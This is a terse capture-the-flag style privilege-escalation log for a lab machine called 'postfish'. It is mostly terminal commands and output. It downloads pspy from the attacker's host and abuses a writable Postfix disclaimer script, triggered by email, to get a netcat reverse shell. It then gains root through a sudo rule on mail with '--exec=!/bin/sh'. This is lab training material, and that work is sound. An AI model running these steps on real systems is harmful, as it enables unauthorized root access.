Priv Esc
EternaLSunshinE
brian.moore@postfish:~$ wget 192.168.45.168/pspy64
--2024-09-11 12:02:45-- http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[=====================================================================================================>] 2.96M 5.99MB/s in 0.5s
2024-09-11 12:02:46 (5.99 MB/s) - ‘pspy64’ saved [3104768/3104768]
brian.moore@postfish:~$ chmod +x pspy64
brian.moore@postfish:~$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer
/var/spool/filter
brian.moore@postfish:/var/spool/filter$ ls -la /etc/postfix/disclaimer
-rwxrwx--- 1 root filter 1184 Sep 11 12:12 /etc/postfix/disclaimer
brian.moore@postfish:~$ cat /etc/postfix/disclaimer_addresses
it@postfish.off
brian.moore@postfish.off
brian.moore@postfish:~$ vi /etc/postfix/disclaimer
$ nc -lnvp 1337
$ swaks --to brian.moore@postfish.off --from adot8 --header 'Subject: Priv me baby!' --body 'Pwned by adot8 <3' --server 192.168.211.137
filter@postfish:/var/spool/postfix$ sudo -l
sudo -l
Matching Defaults entries for filter on postfish:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User filter may run the following commands on postfish:
(ALL) NOPASSWD: /usr/bin/mail *
filter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/sh'
sudo mail --exec='!/bin/sh'
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt && ip a
5372622453fc0880efc5b3257c5c09ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:bf:6a:1a brd ff:ff:ff:ff:ff:ff
inet 192.168.211.137/24 brd 192.168.211.255 scope global ens160
valid_lft forever preferred_lft forever